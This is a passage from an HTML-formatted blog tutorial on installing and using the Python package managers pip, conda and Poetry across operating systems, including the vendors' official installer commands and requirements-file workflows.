&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt; &lt;/p&gt;
&lt;/div&gt;
&lt;div id="ensurepipMacOS" class="tabcontent"&gt;
&lt;h5&gt;masOS&lt;/h5&gt;
&lt;p&gt;
In your preferred terminal run:
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-zsh" data-lang="zsh"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; python3 -m ensurepip --upgrade
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt; &lt;/p&gt;
&lt;/div&gt;
&lt;div id="ensurepipLinux" class="tabcontent"&gt;
&lt;h5&gt;Linux&lt;/h5&gt;
&lt;p&gt;
In your preferred terminal run:
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; python3 -m ensurepip --upgrade
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt; &lt;/p&gt;
&lt;/div&gt;
&lt;h5 id="get_pippy"&gt;&lt;code&gt;get_pip.py&lt;/code&gt;&lt;/h5&gt;
&lt;p&gt;An alternative way to install pip is by using a Python script &lt;code&gt;get-pip.py&lt;/code&gt;.&lt;/p&gt;
&lt;div class="tab"&gt;
&lt;button class="tablinks" onclick="openOS(event, 'pipWindows')"&gt;Windows&lt;/button&gt;
&lt;button class="tablinks" onclick="openOS(event, 'pipMacOS')"&gt;macOS&lt;/button&gt;
&lt;button class="tablinks" onclick="openOS(event, 'pipLinux')"&gt;Linux&lt;/button&gt;
&lt;/div&gt;
&lt;div id="pipWindows" class="tabcontent"&gt;
&lt;h5&gt;Windows&lt;/h5&gt;
&lt;p&gt;
&lt;ol&gt;
&lt;li&gt;Firstly download &lt;code&gt;get_pip.py&lt;/code&gt; by visiting &lt;a href="https://bootstrap.pypa.io/get-pip.py" rel="external"&gt;bootstrap.pypa.io/get-pip.py&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Open the Command Prompt, navigate to the directory where you have downloaded &lt;code&gt;get_pip.py&lt;/code&gt; and then run:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; py get-pip.&lt;span style="color:#79c0ff"&gt;py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt; &lt;/p&gt;
&lt;/div&gt;
&lt;div id="pipMacOS" class="tabcontent"&gt;
&lt;h5&gt;macOS&lt;/h5&gt;
&lt;p&gt;
&lt;ol&gt;
&lt;li&gt;Open your preferred terminal&lt;/li&gt;
&lt;li&gt;Download &lt;code&gt;get-pip.py&lt;/code&gt;:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-zsh" data-lang="zsh"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ol start="3"&gt;
&lt;li&gt;Install pip by running:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; python3 get-pip.py
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div id="pipLinux" class="tabcontent"&gt;
&lt;h5&gt;Linux&lt;/h5&gt;
&lt;p&gt;
&lt;ol&gt;
&lt;li&gt;Open your preferred terminal&lt;/li&gt;
&lt;li&gt;Download &lt;code&gt;get-pip.py&lt;/code&gt;:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; wget https://bootstrap.pypa.io/get-pip.py
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ol start="3"&gt;
&lt;li&gt;Install pip by running:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; python3 get-pip.py
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p&gt;To check pip has installed run:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip3 --version
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h5 id="how-to-use-pip"&gt;How to use pip&lt;/h5&gt;
&lt;p&gt;To install a package:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip3 install package_name
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To uninstall a package:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip3 uninstall package_name
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To upgrade a package:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip3 install --upgrade package_name
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Pip is one of the easier Python package managers for getting started with. It is most-likely already pre-installed with Python and is simple to use. When you install a package with pip it will install any other packages that the desired package depends on. However, when you upgrade a package pip may not automatically update all of its relative dependencies which can lead to conflicts.&lt;/p&gt;
&lt;h4 id="conda"&gt;conda&lt;/h4&gt;
&lt;p&gt;While pip is excellent for most projects, there are cases when you may need a more comprehensive package manager like &lt;a href="https://docs.conda.io/en/latest/" rel="external"&gt;conda&lt;/a&gt;. Conda is primarily associated with &lt;a href="https://www.anaconda.com/" rel="external"&gt;Anaconda&lt;/a&gt; and &lt;a href="https://docs.conda.io/en/latest/miniconda.html" rel="external"&gt;Miniconda&lt;/a&gt;, two Python distributions aimed at scientific computing and data science. Conda can manage not only Python packages from PyPI but also non-Python libraries and binary packages. Furthermore, conda excels at handling dependencies and managing virtual environments (which will be discussed in a later blog).&lt;/p&gt;
&lt;h5 id="how-to-install-conda"&gt;How to install conda&lt;/h5&gt;
&lt;p&gt;Conda can be installed in two ways by either installing Anaconda or Miniconda. We will only consider installing Miniconda in this blog.&lt;/p&gt;
&lt;div class="tab"&gt;
&lt;button class="tablinks" onclick="openOS(event, 'condaWindows')"&gt;Windows&lt;/button&gt;
&lt;button class="tablinks" onclick="openOS(event, 'condaMacOS')"&gt;macOS&lt;/button&gt;
&lt;button class="tablinks" onclick="openOS(event, 'condaLinux')"&gt;Linux&lt;/button&gt;
&lt;/div&gt;
&lt;div id="condaWindows" class="tabcontent"&gt;
&lt;h5&gt;Windows&lt;/h5&gt;
&lt;p&gt;
&lt;ol&gt;
&lt;li&gt;Download the Miniconda installer for Windows from &lt;a href="https://docs.conda.io/en/latest/miniconda.html" rel="external"&gt;docs.conda.io/en/latest/miniconda.html&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Run the installer and follow the prompts to install Miniconda&lt;/li&gt;
&lt;/ol&gt;
&lt;/p&gt;
&lt;/div&gt;
&lt;div id="condaMacOS" class="tabcontent"&gt;
&lt;h5&gt;macOS&lt;/h5&gt;
&lt;p&gt;
&lt;ol&gt;
&lt;li&gt;Download the Miniconda installer for macOS or Linux from &lt;a href="https://docs.conda.io/en/latest/miniconda.html" rel="external"&gt;docs.conda.io/en/latest/miniconda.html&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Open a terminal of your choice and navigate to the directory containing the downloaded installer&lt;/li&gt;
&lt;li&gt;Run the installer script:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-zsh" data-lang="zsh"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; zsh Miniconda3-latest-MacOSX-x86_64.sh
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ol start="4"&gt;
&lt;li&gt;Follow the prompts to install Miniconda&lt;/li&gt;
&lt;/ol&gt;
&lt;/p&gt;
&lt;/div&gt;
&lt;div id="condaLinux" class="tabcontent"&gt;
&lt;h5&gt;Linux&lt;/h5&gt;
&lt;p&gt;
&lt;ol&gt;
&lt;li&gt;Download the Miniconda installer for macOS or Linux from &lt;a href="https://docs.conda.io/en/latest/miniconda.html" rel="external"&gt;docs.conda.io/en/latest/miniconda.html&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Open a terminal of your choice and navigate to the directory containing the downloaded installer&lt;/li&gt;
&lt;li&gt;Run the installer script:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bash Miniconda3-latest-Linux-x86_64.sh
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ol start="4"&gt;
&lt;li&gt;Follow the prompts to install Miniconda&lt;/li&gt;
&lt;/ol&gt;
&lt;/p&gt;
&lt;/div&gt;
&lt;p&gt;To check that Conda has installed run:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;conda --version
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h5 id="how-to-use-conda"&gt;How to use conda&lt;/h5&gt;
&lt;p&gt;To install a package:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;conda install package_name
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To uninstall a package:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;conda remove package_name
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To upgrade a package:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;conda update package_name
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;By default, conda will give preference to packages that are included in the Anaconda distribution. If you need to install PyPI packages that are &lt;em&gt;not&lt;/em&gt; in the default conda distribution, you can install pip by running &lt;code&gt;conda install pip&lt;/code&gt;, then follow the pip instructions above. This will install a version of pip within your conda environment. You need to be careful when using pip inside of conda, for more information on using pip inside conda, Anaconda have written a useful &lt;a href="https://www.anaconda.com/blog/using-pip-in-a-conda-environment" rel="external"&gt;blog&lt;/a&gt; on the subject, including some best practises.&lt;/p&gt;
&lt;h4 id="poetry"&gt;poetry&lt;/h4&gt;
&lt;p&gt;Poetry is a modern and comprehensive Python package manager that combines dependency management and project packaging. It aims to simplify the workflow of managing dependencies and version control, making it an attractive choice for Python developers.&lt;/p&gt;
&lt;h5 id="how-to-install-poetry"&gt;How to install poetry&lt;/h5&gt;
&lt;p&gt;Installation of poetry is slightly more involved than pip and conda, but thankfully poetry have released a Python script to aid in installation which can be accessed at &lt;a href="https://install.python-poetry.org/" rel="external"&gt;install.python-poetry.org&lt;/a&gt;&lt;/p&gt;
&lt;div class="tab"&gt;
&lt;button class="tablinks" onclick="openOS(event, 'poetryWindows')"&gt;Windows&lt;/button&gt;
&lt;button class="tablinks" onclick="openOS(event, 'poetryMacOS')"&gt;macOS&lt;/button&gt;
&lt;button class="tablinks" onclick="openOS(event, 'poetryLinux')"&gt;Linux&lt;/button&gt;
&lt;/div&gt;
&lt;div id="poetryWindows" class="tabcontent"&gt;
&lt;h5&gt;Windows&lt;/h5&gt;
&lt;p&gt;
&lt;ol&gt;
&lt;li&gt;If you are comfortable with using powershell, download and execute the installer script by running:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (Invoke-WebRequest -Uri https&lt;span style="color:#f85149"&gt;:&lt;/span&gt;//install.python-poetry.&lt;span style="color:#79c0ff"&gt;org&lt;/span&gt; -UseBasicParsing).&lt;span style="color:#79c0ff"&gt;Content&lt;/span&gt; | py -
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;            Otherwise, copy and paste the content of the python script from &lt;a href="https://install.python-poetry.org/" rel="external"&gt;install.python-poetry.org&lt;/a&gt; into a file called &lt;code&gt;get-poetry.py&lt;/code&gt; and run:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; py get-poetry.&lt;span style="color:#79c0ff"&gt;py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ol start="2"&gt;
&lt;li&gt;The installer script will have created a &lt;code&gt;poetry&lt;/code&gt; wrapper at &lt;code&gt;%APPDATA%\Python\Scripts&lt;/code&gt;. This path needs to be added to your &lt;code&gt;$PATH&lt;/code&gt; if it has not already been added. You can find out more information on how to edit the &lt;code&gt;$PATH&lt;/code&gt; variable in this &lt;a href="https://www.computerhope.com/issues/ch000549.htm" rel="external"&gt;blog post&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;You may need to restart your machine before the command &lt;code&gt;poetry&lt;/code&gt; will work&lt;/li&gt;
&lt;/ol&gt;
&lt;/p&gt;
&lt;/div&gt;
&lt;div id="poetryMacOS" class="tabcontent"&gt;
&lt;h5&gt;macOS&lt;/h5&gt;
&lt;p&gt;
&lt;ol&gt;
&lt;li&gt;Using your preferred terminal download and execute the installer script by running:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-zsh" data-lang="zsh"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; curl -sSL https://install.python-poetry.org | python3 -
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ol start="2"&gt;
&lt;li&gt;The installer script will have created a &lt;code&gt;poetry&lt;/code&gt; wrapper at &lt;code&gt;$HOME/.local/bin&lt;/code&gt;. This path needs to be added to your &lt;code&gt;$PATH&lt;/code&gt; if it has not already been added. To do this run:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-zsh" data-lang="zsh"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; vim ~/.zshrc
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;            Press &lt;code&gt;i&lt;/code&gt; (to enter insert mode) and add the following line to the file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-zsh" data-lang="zsh"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; export &lt;span style="color:#79c0ff"&gt;PATH&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;$HOME&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;/.local/bin&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;            Press &lt;code&gt;Esc&lt;/code&gt; and then enter &lt;code&gt;:wq&lt;/code&gt; (which will write and quit the file)&lt;/p&gt;
&lt;ol start="3"&gt;
&lt;li&gt;To make the &lt;code&gt;poetry&lt;/code&gt; command recognisable finally run:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-zsh" data-lang="zsh"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; source ~/.zshrc
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt; &lt;/p&gt;
&lt;/div&gt;
&lt;div id="poetryLinux" class="tabcontent"&gt;
&lt;h5&gt;Linux&lt;/h5&gt;
&lt;p&gt;
&lt;ol&gt;
&lt;li&gt;Using your preferred terminal download and execute the installer script by running:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; curl -sSL https://install.python-poetry.org | python3 -
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ol start="2"&gt;
&lt;li&gt;The installer script will have created a &lt;code&gt;poetry&lt;/code&gt; wrapper at &lt;code&gt;$HOME/.local/bin&lt;/code&gt;. This path needs to be added to your &lt;code&gt;$PATH&lt;/code&gt; if it has not already been added. To do this run:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; vim ~/.bashrc
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;            
Press &lt;code&gt;i&lt;/code&gt; (to enter insert mode) and add the following line to the file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-zsh" data-lang="zsh"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; export &lt;span style="color:#79c0ff"&gt;PATH&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;$HOME&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;/.local/bin&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;            Press &lt;code&gt;Esc&lt;/code&gt; and then enter &lt;code&gt;:wq&lt;/code&gt; (which will write and quit the file)&lt;/p&gt;
&lt;ol start="3"&gt;
&lt;li&gt;To make the &lt;code&gt;poetry&lt;/code&gt; command recognisable finally run:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; source ~/.bashrc
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt; &lt;/p&gt;
&lt;/div&gt;
&lt;p&gt;To check that poetry has installed run:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;poetry --version
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h5 id="how-to-use-poetry"&gt;How to use poetry&lt;/h5&gt;
&lt;p&gt;First you need to create a new project:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;poetry new project_name
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To install a package:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;poetry add package_name
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To uninstall a package:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;poetry remove package_name
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To upgrade a package:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;poetry update package_name
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="package-management-in-project-workflows"&gt;Package Management in Project Workflows&lt;/h3&gt;
&lt;p&gt;Python package managers are a critical component of project workflows and can be used in various ways:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Setting up development environments:&lt;/strong&gt; Package managers help developers create consistent development environments across different machines by specifying the package version numbers. In pip this is in the form of a &lt;code&gt;requirements.txt&lt;/code&gt; file, in conda this is an &lt;code&gt;environment.yml&lt;/code&gt; file and in poetry this is a &lt;code&gt;pyproject.toml&lt;/code&gt; file (this includes more than just python packages).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Continuous Integration (CI) and Deployment:&lt;/strong&gt; Package managers facilitate the installation of dependencies in CI systems and deployment servers, ensuring that the application runs as expected in these environments.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Version Control:&lt;/strong&gt; Similar to setting up a development environment, by including a &lt;code&gt;requirements.txt&lt;/code&gt;, &lt;code&gt;environment.yml&lt;/code&gt; or &lt;code&gt;pyproject.toml&lt;/code&gt; file in version control systems like Git, developers can ensure that collaborators and other team members have the same environment setup.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Creating and using these files is pretty straightforward. Lets take a look at how to do this in pip, conda and poetry.&lt;/p&gt;
&lt;h4 id="pip-1"&gt;pip&lt;/h4&gt;
&lt;p&gt;When using pip, it is easy to create a requirements file. All you need to do is run the following command in the terminal.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip3 freeze &amp;gt; requirements.txt
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This will produce a file with content which will look something similar to the example below.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;flake8&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt;4.0.1
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;numpy&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt;1.25.2
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;pandas&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt;2.1.0
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;scikit-learn&lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt;1.3.0
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;code&gt;pip freeze&lt;/code&gt; will produce a list of all the packages you have installed, along with their dependencies and the versions for each package. This list is then written to a file called &lt;code&gt;requirements.txt&lt;/code&gt; by using the &lt;code&gt;&amp;gt;&lt;/code&gt; command to redirect the output from &lt;code&gt;pip freeze&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;To install all the packages and versions from a requirements file within a directory in pip you can execute the following command in the terminal.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip3 install -r requirements.txt
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We use the same command as before when installing a package, however a flag &lt;code&gt;-r&lt;/code&gt; is needed to tell pip to look inside &lt;code&gt;requirements.txt&lt;/code&gt; and pull all the packages and versions from this file.&lt;/p&gt;
&lt;h4 id="conda-1"&gt;conda&lt;/h4&gt;
